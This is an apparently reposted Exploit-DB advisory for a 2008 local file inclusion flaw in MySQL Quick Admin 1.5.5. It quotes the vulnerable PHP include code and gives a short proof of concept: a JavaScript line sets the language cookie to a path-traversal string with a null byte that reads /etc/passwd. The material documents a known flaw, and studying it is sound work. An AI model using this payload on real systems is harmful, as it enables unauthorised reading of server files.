- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6641
- Проверка EDB
-
- Пройдено
- Автор
- JOSS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4455 cve-2008-4454
- Дата публикации
- 2008-10-01
Код:
# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# url: http://www.mysqlquickadmin.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: Pepelux :)
#
# *Requirements: magic_quotes_gpc = Off
vuln file: /includes/required.php
vuln code:
if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
$_SESSION['language'] = $_COOKIE['language'];
}
....
if(LANG == ""){
if(!isset($_SESSION['language'])){
include("lang/english/lang.php");
$_LANG = "english";
} else {
include("lang/".$_SESSION['language']."/lang.php");
$_LANG = $_SESSION['language'];
}
... }
LFI (poc):
1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
2) and enters /index.php
Ingenious work :D
# milw0rm.com [2008-10-01]- Источник
- www.exploit-db.com
